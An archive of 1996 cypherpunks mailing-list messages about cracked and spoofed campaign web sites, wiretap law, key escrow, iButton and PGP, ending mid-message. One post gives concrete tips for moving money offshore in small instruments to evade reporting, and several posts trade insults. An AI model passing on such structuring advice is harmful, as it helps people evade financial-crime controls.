In-Reply-To: <01BBB447.0E066B40@alexf.iss.net>
Message-ID: <199610080549.BAA09679@splinter.rtp.dg.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> The addresses www.dole-kemp.com and www.dole-kemp.org seem to be spoofed 
> sites.  The REAL sites are www.dolekemp96.org and www.dole96.org.  These 
> sites have not been touched.  Hmm, and I thought that internic was supposed 
> to be watching this stuff (domain names).  I wonder if mcdonalds.org is 
> still available...
> 

Well, as of 1:49 AM on Oct 8, www.dole96.org is hacked.  www.dolekemp96.org
is OK.
-- 
Jon F. Spencer   spencerj@rtp.dg.com  (uunet!rtp.dg.com!spencerj)
Data General Corp.                  Phone : (919)248-6246
62 T.W. Alexander Dr, MS #119       FAX   : (919)248-6108
Research Triangle Park, NC  27709   Office RTP 121/9

	Reality is an illusion - perception is what counts.

	No success can compensate for failure in the home.
			President David O. McKay

***** UCC 1-207 ********




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 8 Oct 1996 19:16:34 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: legality of wiretapping: a "key" distinction
In-Reply-To: <199610072122.OAA21916@netcom22.netcom.com>
Message-ID: <Pine.SUN.3.94.961008014523.26588D-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 7 Oct 1996, Vladimir Z. Nuri wrote:

> [wiretaps]

Someone said:

> 
> >It's rarely quoted here because it is unremarkable; just as the list is not
> >a place for basic crypto education, it is not a place for basic legal
> >education. 

"Vlad" replied:

> ooops, you fell for Unicorn's muddying misstatement of my question. OBVIOUSLY
> there is lots of case law on wiretaps. what I was trying to point out
> was that I find little discussion of cases here trying to discredit
> wiretap law for various reasons, such as that the wiretapped
> person is not informed.

The sounds of the wheels spinning in reverse are suddenly very pronounced.

> the distinction of the person *not*being*informed*
> of the wiretap is very important as otehrs here agree, and I would
> expect everyone would be familiar with a simple case that gives a 
> decision on it (in much the way many constitutional cases are
> regularly quoted) or that people would advocate wiretap law would
> be challenged on the basis of the lack of such a precedent case.

There are several cases which refer directly to what you say.  Get off
your fat and go look them up yourself.
 
> >As Brian Davis and Uni have pointed out, people who keep current enough on
> >legal topics to be able to give you a good answer will probably want to get
> >paid for doing so. Saying "here's a legal argument that I made up in the
> >shower. what do you guys think of it?" and expecting a detailed explanation
> >of why it's good or bad is the same as saying "here's my new crypto
> >algorithm that I thought of in the shower, what do you guys think of it?". 
> 
> no, all I am asking for is lawyers who are familiar with wiretap law
> to make a quick case against it based on a commonly-known precedent
> within their field. if you don't want to answer, don't post. (Unicorn
> is free to flame his testicles off as usual.)

Stop asking and start paying lawyers to educate you.  Or sweat through
three years of hell in law school like the rest of us..

> >Go to a law library or larger general library and ask the librarian to show
> >you where the annotated copy of 18 USC 2510 is. Read the statute. Read the
> >legislative history. Read the annotations. Read the cases which were
> >annotated. Repeat this process until you reach 18 USC 2709 or die of boredom.
> 
> I will write on anything I damn well please and research it poorly or
> thoroughly as I like, and whisper questions to any lawyers out there who care
> to talk about the subject to an interested layman.

Go ahead, but don't complain when I flame my testicals off and call you a
lazy ass because above you have just admitted that you are one.  If you
want lawyers who are going to talk to laymen, try a few ABA dinners.  When
you have alienated each and every lawyer there, come back and beg here
again.

> >(The answer to most of the "how do I find out about 'X'?" questions
> 
> you have a lot of good advice, but I ask none of the things you are
> attributing to me. I simply would like to carry on a discussion with
> a civilized lawyer

No such animal.

> who specializes in the subject, rather than have
> a people tell me why I cannot even do this,

A [hypothetical] civilized lawyer will tell you tell you that you can't do
it as quickly as an uncivilized one.

> and must become a law
> specialized before I can even use the word "wiretap" with any 
> meaningfulness.

Though I can only speak with certainty of myself, I think many of the
legal types on the list are tired of typing pages and pages of things only
to have you bring up more innane arguments and demand more cases and so on
and so on.

Witness reputation capital, or debt, in action.

I don't think I would mind so much if a noted and credible source asked me
the same question.  With you I ask, what the hell for?  He can do his own
damn work and will probably post less if he is spending some time in the
library.  It is directly against my interests to make anything easier for
you.

Why when you use the word "wiretap" is it cause for me to get huffy?
Because you are below the level of capital where I will have any part of
supporting or contributing your "arguments."

> the chief point of my post was to question why the EFF etc. are not
> at all interested in challenging the wiretap "status quo" in spite
> of what many people here believe/advocate-- that wiretapping was
> never legitimate in the first place.

1>  The Status Quo is so entrenched and useful to law enforcement, that
the likes of EFF will never change it.

2>  "Many people here believe/advocate"  Where are the figures on this?

> this is curious because EFF
> etc. *are* willing to back up the cryptography cases out there,
> ala Bernstein etc.

Gee, might it be that cryptography cases are a new area of law where
limited resources are better applied because uncertainty in the law is
greater?  Duh.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 8 Oct 1996 18:00:16 +0800
To: jya@pipeline.com (John Young)
Subject: Re: Big Brother vs. Cypherpunks
In-Reply-To: <1.5.4.16.19961007211311.2c1faa7e@pop.pipeline.com>
Message-ID: <199610080717.CAA00818@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


Mr. Young posted:
>    Time, October 14, 1996, p. 78.
>    Joshua Quittner
>    Big Brother vs. Cypherpunks

>    Are they right? It's hard to know whom to believe in this
>    cloak-and-dagger debate. Civil libertarians tend to gloss
>    over the fact that the world is full of bad people with
>    crimes to hide. The software industry -- which makes 48%

     No, some of us "Civil libertarians" are well aware that there
are bad people in this world. We just acknowlege that some of these
bad people are IN THE GOVERNMENT, that some of these people are in 
other positions of power, and that the rest of the bad people are 
relatively unlikely to be negatively effected by these schemes. It is 
more likely that the "bad guys" will be positively effected (to OUR 
disadvantage) by forcing us to use bad crypto. If the NSA can 
break the encryption in near real time, then the "bad people" can 
get the tools to do it nearly as fast (sure, it will cost them 
2 or 3 hundred thousand dollars, but they just busted a drug ring 
in one housing project here in chicago that was making that much 
money in a week) Do you know what your privacy is worth? Find out 
how much Amex charges for it's database of your purchasing habits. 
Then think about how much some "bad guy" could make by cracking 
medical or credit information that is being transfered across "The Net".  

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Betty G. O'Hearn" <betty@infowar.com>
Date: Tue, 8 Oct 1996 19:42:30 +0800
To: news_from_wschwartau@infowar.com
Subject: New On WWW.Infowar.Com
Message-ID: <1.5.4.32.19961008064422.0072cfbc@mail.infowar.com>
MIME-Version: 1.0
Content-Type: text/plain


We thank our sponsors:

National Computer Security Association
Open Source Solutions
New Dimensions International - Security Training


New On WWW.Infowar.Com This week. Take a look. Pass it on.


* Internet plug pulled on Colombia's guerrillas.

         *   VP Gore Statement on Encryption, Oct. 1, 1996.
         *   Europe
         *   UK Tries to Remove Pornography from the Net.
         *   Data Protection and  Privacy on the Internet.

  * "Avoiding Technologically-Induced Delusions of Grandeur:
        Preparing the Air Force for an Information Warfare (IW) Environment"

  * Michael Wilson's, "Terrorism in a New World--THE
EVOLUTION IN REVOLUTION" 

  * Cyberwar, by Campen, Dearth, and Goodden.

  * Issues from the C4I-Pro-Digest.

  * 50 Fascinating URL's.

  * EMP gun's to be tested by law enforcement.

  * Administration to ease export of encryption software.
 
  * An interesting editorial comment on the Gulf War Syndrome.

  * Microsoft goofs in China.

  * New For August and September... Check it out and see what you missed.!

        and   More Utilities!!!!!

       
*************************************************************
DIRECT REQUESTS to <list@infowar.com> with one-line, 
in the body NOT the subject line:
   leave news_from_wschwartau (to leave group)
   subscribe news_from_wschwartau (to join group)

Infowar.com
Managed by Winn Schwartau
winn@inforwar.com
http://www.infowar.com
813-393-6600  Voice
813-393-6361   Fax
Comments, Content, or Sponsor Opportunities ?
betty@infowar.com
813-367-7277   Voice
813-363-7277    Fax
Betty G.O'Hearn
Information Warfare and InfoSecurity
Assistant to Mr. Winn Schwartau
http://www.infowar.com
betty@infowar.com
813-367-7277  Voice
813-363-7277  FAX








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dustman@athensnet.com (Anonymous)
Date: Tue, 8 Oct 1996 17:53:30 +0800
To: cypherpunks@toad.com
Subject: Re: Dallas Semiconductor turns on Internet commerce at the touch of a button
Message-ID: <199610080719.DAA06785@porky.athensnet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 7 Oct 1996, Robert Hettinga wrote:

>     iButton users will have universal access to their World Wide Web
                                                        ^^^^^^^^^^^^^^
> e-mail at public Internet connections (hotels, airports, kiosks) and
  ^^^^^^

I think that says it all.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Tue, 8 Oct 1996 23:56:46 +0800
To: cypherpunks@toad.com
Subject: Re: unsubsribe
In-Reply-To: <199610071943.MAA16975@dns1.noc.best.net>
Message-ID: <Pine.SUN.3.91.961008052235.8521D-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


I, on the other hand, will unsubsribe you for just $50 in e-cash.

-Declan 

On Mon, 7 Oct 1996, James A. Donald wrote:

> At 11:04 AM 10/2/96 GMT, GOULDING CP wrote:
> >unsubsribe
> 
> How to unsubsribe is a closely guarded cypherpunk secret.
> 
> I will send you unsubsription information if you prove
> you are a genuine cypherpunk by sending me the secret
> code word in a PGP encrypted message.
> 
>  ---------------------------------------------------------------------
>               				|  
> We have the right to defend ourselves	|   http://www.jim.com/jamesd/
> and our property, because of the kind	|  
> of animals that we are. True law	|   James A. Donald
> derives from this right, not from the	|  
> arbitrary power of the state.		|   jamesd@echeque.com
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 8 Oct 1996 23:41:23 +0800
To: cypherpunks@toad.com
Subject: Re: EUB - Pay attention next time guys.
In-Reply-To: <9610080735.AA07736@merak.idola.net.id>
Message-ID: <RZ8gVD29w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Maryanto Tuan dan Puan <lamdn@idola.net.id> writes:

> Please unsubscibe lamdn@idola.net.id

Where the heck is 'id'?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 8 Oct 1996 21:43:50 +0800
To: "James A. Donald" <unicorn@schloss.li>
Subject: Re: Put up or shut up!
Message-ID: <3.0b19.32.19961008065505.00d0a9c4@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:44 AM 10/7/96 -0700, James A. Donald wrote:

>The reason that no one publishes "How to" step by step instructions for 
>discretely expatriating your money is exactly the same reason as the reason
>that nobody publishes "How to" step by step instructions for buying dope.
>
>For example one ever popular method of expatriating money, (or repatriating
>it to preferred politicians), is by means of a friendly cattle futures 
>broker.

I have read many descriptions of techniques to discretely expatriate one's
money over the years.  Some were good and many bad but they are certainly
out there.  Since it is actually a trivial problem until one reaches the
second million or so, individuals can usually come up with fair methods for
themselves.  (Try to avoid the bags of $100 bills on the airplane though.)

DCF  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 9 Oct 1996 04:39:57 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: challenging wiretap law
In-Reply-To: <199610080136.SAA15855@netcom21.netcom.com>
Message-ID: <325A63FF.7EC7@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Vladimir Z. Nuri wrote:

[some text deleted]

> challenging these laws in the weak spots
> could be a very devastating means of
> defying law enforcement claims that they only want to "preserve
> the status quo" and want "no new authorities to wiretap". could
> wiretapping be "nipped in the bud" somehow? there is tremendous
> economic incentive for laywers to challenge things like patents
> etc, but this same incentive doesn't seem to exist in challenging
> wiretap rules. hence I wonder if they have been challenged to the
> same extent that  other court decisions have been.

[more text deleted]

Do prior comments about wholesale non-compliance on the part of the 
public apply here as it did on, say, the 55-mph speed limit?

How about total non-compliance on the part of the public regarding
sex laws (those which said you couldn't do such-and-such in your own 
bedroom with your partner/spouse, etc.)?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin Stephenson <cts@deltanet.com>
Date: Wed, 9 Oct 1996 03:39:44 +0800
To: cypherpunks@toad.com
Subject: Re: Dallas Semiconductor turns on Internet commerce at the touch of a button
In-Reply-To: <199610080719.DAA06785@porky.athensnet.com>
Message-ID: <325A6537.5D71@deltanet.com>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous wrote:
> 
> On Mon, 7 Oct 1996, Robert Hettinga wrote:
> 
> >     iButton users will have universal access to their World Wide Web
>                                                         ^^^^^^^^^^^^^^
> > e-mail at public Internet connections (hotels, airports, kiosks) and
>   ^^^^^^
> 
> I think that says it all.

Take a look at their random number generator. I can't see how it
provides enough entropy, therefore, a secure connection.

Kevin Stephenson




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Wed, 9 Oct 1996 01:33:16 +0800
To: cypherpunks@toad.com
Subject: Re: Missionaries (was: "Mormon Asshole?" re: GAK)
In-Reply-To: <961007.215142.1A1.rnr.w165w@sendai.scytale.com>
Message-ID: <961008.073028.3i8.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, roy@scytale.com writes:

> -----BEGIN PGP MESSAGE-----

Oops, sorry folks.  Seems I hit the wrong key.  What I meant to say was:

| In list.cypherpunks, attila@primenet.com writes:
|
| > .Food for thought:  suppose he didn't - why would any rational individual
| > .follow a religion he thought was wrong?
| >
| >
| >         that statement is profound in more ways that in religion!  why
| >     would any rational individual espouse ANY cause he thought was
| >     wrong!
|
| What about when the individual stands to gain from the cause while not
| subject to the negative effects?  Politicians come readily to mind.
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
DNRC Minister Plenipotentiary of All Things Confusing, Software Division
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMlpJsxvikii9febJAQGcmQP+OuqbQo2Ymt2TnsH6IzZLm/xUQoUE5d71
fevp/f6alrP/+Cuy+/x9NJTv0ocdbBSao7ueWf5XuJJgzNFz5B2Qn047FjPogBGs
4uokXefrlSMOMonLAnBQAdFG2T7/hySESVH7TwzMM9dAyMSio88Z6H3q2DdcbSOU
HDnxDNmYOA8=
=M2IV
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce M." <bkmarsh@feist.com>
Date: Wed, 9 Oct 1996 02:18:13 +0800
To: cypherpunks@toad.com
Subject: Re: Dole web site cracked?
In-Reply-To: <199610080549.BAA09679@splinter.rtp.dg.com>
Message-ID: <Pine.BSI.3.91.961008082645.14596A-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 8 Oct 1996, Jon Spencer wrote:

> > The addresses www.dole-kemp.com and www.dole-kemp.org seem to be spoofed 
> > sites.  The REAL sites are www.dolekemp96.org and www.dole96.org.  These 
> > sites have not been touched.  Hmm, and I thought that internic was supposed 
> > to be watching this stuff (domain names).  I wonder if mcdonalds.org is 
> > still available...

> Well, as of 1:49 AM on Oct 8, www.dole96.org is hacked.  

    This has always been a 'hacked' site in the sense that it wasn't ever 
an official Dole site and people hosted it for laughs.  The same 
apparently applies to www.dole-kemp.org and www-dole-kemp.com.
                       ________________________________
                      [ Bruce M. - Feist Systems, Inc. ]
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
      "We don't want to get our butts kicked by a bunch of long-haired 
        26-year-olds with earrings." -- General John Sheehan on their 
                       reasons for InfoWar involvement





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: VaX#n8 <vax@linkdead.paranoia.com>
Date: Wed, 9 Oct 1996 03:10:19 +0800
To: "Chris Adams" <adamsc@io-online.com>
Subject: Re: encrypting pppd?
In-Reply-To: <19961007204519812.AAA220@GIGANTE>
Message-ID: <199610081334.IAA03596@linkdead.paranoia.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <19961007204519812.AAA220@GIGANTE>, Adamsc writes:
>>If you encrypt the entire link level properly then ...
>What about predictabilities in the PPP datastream?

They exist.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 9 Oct 1996 05:26:31 +0800
To: cypherpunks@toad.com
Subject: Re: yellow journalism and Encryption
In-Reply-To: <v03007807ae7f9faefb54@[204.179.128.206]>
Message-ID: <v03007801ae80352ca478@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



Vinnie may think this is "asswipe journalism," but I think it's one of the
more interesting and revealing articles we've seen. In fact, it's a pretty
good summary of the history of wiretaps, the tension between privacy and
surveillance, and the thinking of those pushing for GAK/Key Recovery.


At 11:12 PM -0700 10/7/96, Vinnie Moscaritolo wrote:

>http://www.sfgate.com/cgi-bin/examiner/article.cgi?year=1996&month=10&day=06&ar
>t
>Encryption controversy pits life against liberty
>TOM ABATE
>EXAMINER COLUMNIST
...
>"Wiretapping is the main issue," said Stewart Baker, former general counsel
>of the National Security Agency, the CIA's code-breaking and eavesdroping
>cousin.


Notice what this means. It means the longterm goal of "Key Recovery" is for
*domestic* use as well, as this is where the vast number of wiretaps in
criminal cases occurs.

We all knew this, of course, but it's useful to see Stewart Baker
explicitly conceding the point. He did not say: "Exports of critical
technology to other countries is the main issue." He said: "Wiretapping is
the main issue."

While no doubt many of the "criminals" the Feds wish to wiretap are
communicating offshore and hence _might_ be using GAK (I emphasize
"might"), clearly a large fraction of the crimes the Feds wish to track are
almost wholly domestic. The John Gottis of the world talking to their
compadres, the militias planning bombings, the child pornography ring,
whatever. The Unabomber. Most are domestic. The U.S. is a big country. As
Baker points out, "Wiretapping is the main issue."



>"If two criminals are discussing a plot over the telephone and we have a
>wiretap order, the encryption would negate the wiretap," said Michael
>Vatis, a senior Department of Justice official.

And _export_ controls on crypto would affect this how?

>The same would happen if investigators seized the computerized bookkeeping
>records of a drug-smuggling ring only to find they were saved in an
>unbreakable code. But as frustrating as it might be to seize a mound of
>indecipherable evidence, it was the prospect of losing the wiretap that got
>Vatis most aroused.

And _export_ controls on crypto would affect this how?

>Having access to a spare set of code-breaking keys "is not a shift in the
>balance of power," Vatis said. "It's preserving
>the status quo."

Clearly these folks are talking as if GAK/Key Recovery is mandated for
_domestic_ communications.

(I think we'll be seeing some mighty interesting documents and discussions
coming out as FOIAs are filed. Just as the FOIAs a few years ago showed the
true thinking behind Clipper: the eventual outlawing of non-Clipper
alternatives.)



"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Wed, 9 Oct 1996 05:55:34 +0800
To: cypherpunks@toad.com
Subject: Re: Put up or shut up!
Message-ID: <v02130501ae7fc9432758@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>At 12:44 AM 10/7/96 -0700, James A. Donald wrote:
>
>>The reason that no one publishes "How to" step by step instructions for
>>discretely expatriating your money is exactly the same reason as the reason
>>that nobody publishes "How to" step by step instructions for buying dope.
>>
>>For example one ever popular method of expatriating money, (or repatriating
>>it to preferred politicians), is by means of a friendly cattle futures
>>broker.
>

After establishing your offshore banking account you can move moderate
amounts of money there from the U.S. by using private money order or
travellers checks.  Most money transmitters and banks won't ask for ID or
that you fill out the payorpayee in the process.  If you live in a large
city there should be enough outlest to enable you to transport
$10,000s/month without seeing the same merchant twice in same month.  It'll
just look like you don't have a checking account and are paying you're
monthly bills.

The advantage of these instruments, of course, is that they are relatvely
safe from loss.

As was pointed out earlier on the list, you can use FedEx to send int'l
parcels w/o providing identification.

-- Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Wed, 9 Oct 1996 00:51:26 +0800
To: cypherpunks@toad.com
Subject: PLEASE take Mormon/LDS stuff to private mail.
Message-ID: <199610081302.GAA12663@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


While I realize that religious arguments, in the large sense, are a 
well-honed skill of many of the participants of this list, the current 
threads concerning the LDS/Mormon church are so far off-topic that
it isn't funny, just annoying.

PLEASE take this stuff to private mail. Most of us have little or no
interest in it, and it's creating entirely unnecessary discord and 
hatred (not to mention using up bandwidth).

Unless a group takes a stand on encryption, lets keep them out of
it.

Please!

Peter Trei
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@amaonline.com>
Date: Wed, 9 Oct 1996 05:17:32 +0800
To: cypherpunks@toad.com
Subject: Re: EUB - Pay attention next time guys.
Message-ID: <199610081619.JAA17271@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Tue Oct 08 11:16:29 1996
> Maryanto Tuan dan Puan <lamdn@idola.net.id> writes:
> 
> > Please unsubscibe lamdn@idola.net.id
> 
> Where the heck is 'id'?

Right in there between the Ego and SuperEgo :-)

(sorry, couldn't pass it up...)

Dave Merriman

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
PGP Email welcome, encouraged, and PREFERRED. Visit my web
site at         http://www.shellback.com/p/merriman
for my PGP key and fingerprint
"What is the sound of one hand clapping in a forest
with no one there to hear it?"
I use Pronto Secure (tm) PGP-fluent Email software for Windows
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMlnHkMVrTvyYOzAZAQFh5AP8Cy6Y8ArlwRxGlX0p5yqef6C7D9VPFgRW
XT+g5jNvXqPOHXUKhSpUigCmSurGkL1wKQzf5lNXF6C1xYUSai/bvDoms15LF1MR
YnXoR9/5ate7rMfSmRmfZvEOJOXI1CiHpNkZh92Qnc1Hf682B36vJIlZk6n9Nwag
5+EFYjs9pIg=
=t8n9
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Wed, 9 Oct 1996 07:00:59 +0800
To: pjb@ny.ubs.com
Subject: Re: Recent Web site cracks
Message-ID: <199610081636.MAA10912@attrh1.attrh.att.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:46 AM 10/8/96 -0400, pjb@ny.ubs.com wrote:
>The recent cracks of the DOJ, CIA and Dole web sites have caused me to think 
>about just what is going on here.
>
>Do you suppose that these entries were made via the httpd route, maybe via 
>cgi-bin, or just a straight telnet-type entry to the server?  I don't know 
>what operating systems were involved with these three systems, or even if

The DOJ and CIA sites were actually cracked; don't know the mechanisms.
The dole-kemp96.com and dole-kemp96.org domains were spoofs - they
have similar names to the real site, and people reach them by accident
or by hearing about them.  According to today's San Jose Mercury News,
the web designer who registered them did so just before Dole announced
Kemp as his VP, and tried to sell his design services to the campaign.
They didn't buy it, and the names were sitting around with nothing
better to do anyway, so he decided to have a good time with them.
Supposedly he's gotten about 40,000 hits and the "real" site got 1,000,000.


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Wed, 9 Oct 1996 06:43:16 +0800
To: cypherpunks@toad.com
Subject: PGP implements Key Recovery today!
Message-ID: <199610081636.MAA10922@attrh1.attrh.att.com>
MIME-Version: 1.0
Content-Type: text/plain


PGP has provided a key recovery option for several years.
You can either use the EncryptToSelf option, or use multiple recipients,
one of which is your favorite backup service (or yourself,
perhaps one of your other keys.)  Works fine, and you can use it
to recover the session key when you want.  Keep a backup copy
of your private key on a floppy in your safe deposit box,
and maybe keep your passphrase on a yellow sticky (:-)
and you're all set.

Now, if PGP had a single-DES option for encryption, they could
apply for an export permit......

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 9 Oct 1996 07:01:50 +0800
To: Robert Hettinga <cypherpunks@toad.com
Subject: Re: Dallas Semiconductor turns on Internet commerce at the touch of a button
Message-ID: <199610081636.JAA26969@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:13 AM 10/7/96 -0400, Robert Hettinga wrote:
>Dallas Semiconductor turns on Internet commerce at the touch of
>a button; wearable computer chip generates uncrackable codes using public
>key cryptography
>----------------------------------------------------------------------
>    DALLAS--(BUSINESS WIRE)--Oct. 7, 1996--
>...
>    Unlike a loose plastic card, the iButton stays attached even
>while communicating, making misplacement less likely.  Messages or
>transactions are authorized only after the PIN is validated by the
>iButton, the same technique automatic teller machines use to
>dispense cash.

What bothers me about such schemes is this:  What happens if the insecure
machine which accepts your PIN and transfers it to the iButton then
performs a transaction which you have not authorized.  E.g. it transfers
$10 rather than $.01.  You can collect quite a bit by repeating the scam.

I have not heard of a trust protocol which does not require some form of
input and/or output on the iButton itself.  All the ones which can be used
by normal humans (e.g. do not require the user to do public key
cryptography in his/her head) require both a small display and a
approve/disapprove button.  I think the credit card calculator form factor
is attractive for this application.


-------------------------------------------------------------------------
Bill Frantz       | "Cave softly, cave safely, | Periwinkle -- Consulting
(408)356-8506     | and cave with duct tape."  | 16345 Englewood Ave.
frantz@netcom.com |           - Marianne Russo | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Wed, 9 Oct 1996 02:54:50 +0800
To: cypherpunks@toad.com
Subject: Re: EUB - Pay attention next time guys.
Message-ID: <199610081341.GAA13614@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> Maryanto Tuan dan Puan <lamdn@idola.net.id> writes:
> > Please unsubscibe lamdn@idola.net.id
> Where the heck is 'id'? 
> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

Indonesia, as you should have been able to find out for yourself.

Peter Trei
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com
Date: Wed, 9 Oct 1996 02:29:51 +0800
To: cypherpunks@toad.com
Subject: Recent Web site cracks
Message-ID: <199610081346.JAA09181@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


The recent cracks of the DOJ, CIA and Dole web sites have caused me to think 
about just what is going on here.

Do you suppose that these entries were made via the httpd route, maybe via 
cgi-bin, or just a straight telnet-type entry to the server?  I don't know 
what operating systems were involved with these three systems, or even if it 
was the same in all cases.  I expect that there have been other such break-ins 
that we have not heard about.

The speed with which the attacks are made, and the completeness of the hack 
seems to indicate that someone knows something.

As a long-time Unix Sys Admin, I am aware that most security holes are due 
to piss-poor administration, with a few system holes that may be exploited 
by the reasonably sophisticated, but I am not aware of any glaring holes in 
the httpd code.  I suppose it's  stupid of me to think this, but I would have 
though that these three sites in particular, would have cleaned-up their act 
in this respect.

I suppose that it is possible that there is a route back, through the browser, 
but this doesn't seem very likely, even with a thoroughly hacked, custom browser.

Does anyone have any ideas about these attacks, how and where the entry was 
made, which operating systems were involved, etc?

Cheers,

	-paul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com
Date: Wed, 9 Oct 1996 03:28:53 +0800
To: cypherpunks@toad.com
Subject: Re: PGP
Message-ID: <199610081354.JAA09189@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


this is recycling at it's best. (-:

	-paul

> From cypherpunks-errors@toad.com Mon Oct  7 03:05:47 1996
> Date: Sun, 6 Oct 1996 21:35:02 -0400
> To: cypherpunks@toad.com
> From: dustman@athensnet.com (Anonymous)
> Comments: Please report misuse of this automated remailing service to <dustman@athensnet.com>
> Subject: Re: PGP
> Sender: owner-cypherpunks@toad.com
> Content-Length: 238
> 
> > From: nobody@cypherpunks.ca (John Anonymous MacDonald)
> > 
> > There's a rumor that Timmy C. May sells his dead relatives as fertiliser as 
> > they constitute the best shit in California.
> 
> Where can I buy some of this fertilizer?
> 
> Thanks.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Humble <deeb@x.org>
Date: Wed, 9 Oct 1996 04:09:31 +0800
To: attila@primenet.com
Subject: Re: Missionaries (was: "Mormon Asshole?" re: GAK)
In-Reply-To: <199610071855.MAA05992@infowest.com>
Message-ID: <9610081444.AA23161@hydra.cde.x.org>
MIME-Version: 1.0
Content-Type: text/plain


attila <attila@primenet.com> sez:
